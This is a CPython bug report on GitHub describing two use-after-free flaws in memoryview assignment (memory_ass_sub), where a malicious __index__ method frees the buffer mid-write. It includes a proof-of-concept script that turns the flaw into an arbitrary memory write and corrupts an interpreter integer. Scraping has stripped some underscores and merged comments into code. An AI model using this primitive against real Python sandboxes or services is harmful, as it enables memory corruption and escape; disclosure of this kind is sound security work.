Use After Free when assigning into a memoryview · Issue #92888 · python/cpython (original) (raw)

Bug report

within memoryview.c, I have found two Use After Frees, both based around memory_ass_sub.
The first is if a class with a malicious __index__ method is used as the index for the assignment, its index method is called after the memoryview is checked if it is released. This allows the index method to release the memory view and backing buffer, leading to a write to freed memory when the write completes. The same vuln exists if the class with a malicious index method is used as the assigned value, as its __index__ method is called inside of pack_single

memoryview Use After Free (memory_ass_sub)

uaf_backing = bytearray(bytearray.basicsize) uaf_view = memoryview(uaf_backing).cast('n') # ssize_t format

class weird_index: def index(self): global memory_backing uaf_view.release() # release memoryview (UAF) # free uaf_backing memory and allocate a new bytearray into it memory_backing = uaf_backing.clear() or bytearray() return 2 # ob_size idx

by the time this line finishes executing, it writes the max ptr size

into the ob_size slot of memory_backing

uaf_view[weird_index()] = (2 ** (tuple.itemsize * 8) - 1) // 2 memory = memoryview(memory_backing) memory[id(250) + int.basicsize] = 100 print(250) # prints 100

Your environment